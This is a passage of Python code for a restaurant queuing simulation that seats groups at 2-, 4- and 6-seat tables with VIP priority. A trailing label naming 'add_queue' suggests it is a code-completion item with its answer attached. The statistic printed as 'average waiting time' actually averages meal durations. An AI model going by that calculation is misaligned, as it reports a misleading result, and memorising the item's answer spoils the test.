if group.get_vip(): # A VIP group skips ahead of the most recent arrivals (at most four) but never passes another VIP
enterQueue = False
if len(self.groups) >= 4:
for i in range(0, 4):
if self.groups[i].get_vip():
self.groups.insert(i, group)
enterQueue = True
break
if (enterQueue is False):
self.groups.insert(4, group)
elif len(self.groups) > 1 and len(self.groups) < 4:
for i in range(0, len(self.groups)):
if self.groups[i].get_vip():
self.groups.insert(i, group)
enterQueue = True
break
if (enterQueue is False):
self.groups.insert(1, group)
elif len(self.groups) <= 1:
self.groups.insert(0, group)
elif group.get_vip() is False:
self.groups.insert(0, group)
def del_queue(self): # pop the last list element, i.e. the group that arrived first
"""
Pop the head of the queue (the element at index len(queue) - 1)
:return: Object Group
"""
return self.groups.pop()
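# Added note on the list orientation used above: new groups are inserted near index 0 and
# del_queue() pops from the end of the list, so the last element is the front of the queue
# (the group that has waited longest) and index 0 is the back.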
class Table:
def __init__(self, num, size):
self.num = num # No. of the table
self.size = size # Size of the table: for group of up to 2, 4 or 6.
self.currentGroup = None # Is the table occupied or not.
def busy(self):
if self.currentGroup != None:
return True
else:
return False
def startNext(self, newGroup):
self.currentGroup = newGroup
def cleanTable(self):
"""
When a group finishes its meal, set the table's current group to None
"""
self.currentGroup = None
def get_num(self):
return self.num
class Group:
def __init__(self, time, size, vip, groupID):
self.timestamp = time # Time when group registered (entered into the queue)
self.size = size # randomly define size from 1 - 6
self.vip = vip # Whether the group is a vip group
self.table = None # Which table the group will be assigned to
# How long will the group spend on the table
if (size == 1) or (size == 2):
self.timeRequest = mod_pert_random(0, 40, 90, samples=1).astype(int)
elif (size == 3) or (size == 4):
self.timeRequest = mod_pert_random(45,75,120, samples=1).astype(int)
elif (size == 5) or (size == 6):
self.timeRequest = mod_pert_random(60,100,150, samples=1).astype(int)
self.groupID = groupID
def get_groupID(self):
return self.groupID
def get_stamp(self):
"""
Get the registration time of the group
:return: int, time point when the group came
"""
return self.timestamp
def get_size(self):
return self.size
def wait_time(self, current_time):
"""
Calculate the waiting time for the group
:param current_time: current time point
:return: waiting time for current group
>>> g0=Group(20,2,False,0)
>>> g0.wait_time(71)
51
"""
return current_time - self.timestamp
def get_vip(self):
return self.vip
def get_time_request(self):
return self.timeRequest
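# Added summary of the meal-length model above: parties of 1-2 draw a PERT time from
# (0, 40, 90) minutes, parties of 3-4 from (45, 75, 120) and parties of 5-6 from
# (60, 100, 150); each draw is a one-element numpy array cast to int.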
def tablesSetting(number_tables_2, number_tables_4, number_tables_6):
"""
Initialize tables
:param number_tables_2: number of tables for groups with one or two customers. (6)
:param number_tables_4: number of tables for groups with three or four customers. (4)
:param number_tables_6: number of tables for groups with five or six customers. (2)
:return: three lists, each for one type of tables, and the elements in every list are Table Objects.
>>> t2,t4,t6 = tablesSetting(6,4,2)
>>> len(t2)
6
>>> len(t4)
4
>>> len(t6)
2
"""
table_2_list = []
table_4_list = []
table_6_list = []
for i in range(number_tables_2):
table_2_list.append(Table(i, 2))
for i in range(number_tables_4):
table_4_list.append(Table(i + number_tables_2, 4))
for i in range(number_tables_6):
table_6_list.append(Table(i + number_tables_4 + number_tables_2, 6))
return (table_2_list, table_4_list, table_6_list)
def TableFinish(current_time, nextGroup_endTime, table_type):
"""
Clean the table when the group on it finished the meal
:param current_time: current time point
:param nextGroup_endTime: dict mapping table number to the time at which the group currently at that table finishes
:param table_type: list, whose element is Table objects
:return None
"""
if (current_time in nextGroup_endTime.values()):
for n in list(nextGroup_endTime.keys()):
if current_time == int(nextGroup_endTime[n]):
if len(table_type)==6:
table_type[n].cleanTable()
elif len(table_type)==4:
table_type[n-6].cleanTable()
elif len(table_type)==2:
table_type[n-10].cleanTable()
def simulation(current_time, table, total_time, queue, total_timeR, nextGroup_endTime):
"""
Simulation at one specific time point (current_time)
:param current_time: time point, at which current simulation is running.
:param table: list, the elements in which are Table Objects.
:param queue: queue for groups
:param total_time: Duration
:param total_timeR: list, storing waiting time for each group served or is being served
:param nextGroup_endTime: dict mapping table number to the time at which the group currently at that table finishes
"""
TableFinish(current_time, nextGroup_endTime, table)
for t in table:
if (t.busy() == False) and (not queue.isEmpty()):
nextGroup = queue.del_queue()
t.startNext(nextGroup)
print('Group No.', nextGroup.get_groupID(), 'will be assigned to Table', t.get_num(), '.\n', 'Their waiting time is',nextGroup.wait_time(current_time), 'minute(s).\n')
# Update the ending time for tables
nextGroup_endTime[t.get_num()] = current_time + nextGroup.get_time_request() + 2
total_timeR.append(int(nextGroup.get_time_request()) + 2)
# Simulation duration is over; handle groups that were never assigned a table
if current_time == total_time- 1:
at_least_waittime = []
for i in range(queue.queue_size()):
if len(nextGroup_endTime) > 0:
next_finish_time = min(nextGroup_endTime.values())
next_finish_table = min(nextGroup_endTime, key=nextGroup_endTime.get)
unpro_next = queue.del_queue()
print('Group', unpro_next.get_groupID(), 'needs to wait',
int(unpro_next.wait_time(next_finish_time)), 'minute(s) to be assigned.')
at_least_waittime.append(int(unpro_next.wait_time(next_finish_time)))
nextGroup_endTime.pop(next_finish_table)
else:
unpro_next = queue.del_queue()
print('There are still', i, 'Groups in front of Group No.',
unpro_next.get_groupID(), 'they need to wait at least', max(at_least_waittime),
'minute(s) to be assigned.')
def generation(Duration, amount):
"""
Generate the data for the groups and run the simulation
:param Duration: Total length of time the simulation will run
:param amount: Estimated number of groups expected to come
"""
# Generate group sizes, the total group number is "amount", the number of people in each group is between 1 and 6
size = np.random.randint(1, 7, amount)
# Flag VIP groups: a draw of 0-8 out of 0-100 marks the group as VIP (roughly an 8% chance)
vip = []
for i in range(amount):
num = np.random.randint(0, 101, 1)
if (num >= 0) & (num <= 8):
vip.append(True)
else:
vip.append(False)
# Generate the registration time for each group
timestamp_list = mod_pert_random(0, Duration // 2, Duration, samples=amount).astype(int)
timestamp_list = list(timestamp_list)
counter = 0
queue_2 = Queue()
queue_4 = Queue()
queue_6 = Queue()
table_2, table_4, table_6 = tablesSetting(6, 4, 2) # Initializing tables
total_timeR_2 = [] # For calculating total average waiting time
nextGroup_endTime_2 = {} # {No. of table: the ending time of the table}
total_timeR_4 = []
nextGroup_endTime_4 = {}
total_timeR_6 = []
nextGroup_endTime_6 = {}
groupNumb = 0 # every group gets a unique ID
for i in range(Duration):
while i in timestamp_list:
if size[counter] == 1 or size[counter] == 2:
queue_2.add_queue(Group(i, 2, vip[counter], groupNumb))
counter += 1
groupNumb += 1
elif size[counter] == 3 or size[counter] == 4:
queue_4.add_queue(Group(i, 4, vip[counter], groupNumb))
counter += 1
groupNumb += 1
elif size[counter] == 5 or size[counter] == 6:
queue_6.add_queue(Group(i, 6, vip[counter], groupNumb))
counter += 1
groupNumb += 1
timestamp_list.remove(i) # Handle several groups arriving at the same time point
# Run the simulation
simulation(i, table_2, Duration, queue_2, total_timeR_2, nextGroup_endTime_2)
simulation(i, table_4, Duration, queue_4, total_timeR_4, nextGroup_endTime_4)
simulation(i, table_6, Duration, queue_6, total_timeR_6, nextGroup_endTime_6)
# Summary
if i == Duration-1:
print("Total groups served (groups who finished their meal or on the table currently):",
len(total_timeR_2)+len(total_timeR_4)+len(total_timeR_6))
avg=(sum(total_timeR_2)+sum(total_timeR_4)+sum(total_timeR_6))/(len(total_timeR_2)+len(total_timeR_4)+len(total_timeR_6))
print('Average waiting time for groups served: {0:.2f}'.format(avg), "minute(s)")
def client():
print('Welcome to Restaurant Queuing Simulation System!')
print('Please enter the total time (integer) you want for simulation:')
duration=int(input())
print('Please enter the total groups of customers you predict the restaurant would have:')
groups=int(input())
generation(duration, groups)
client()
| add_queue | identifier_name |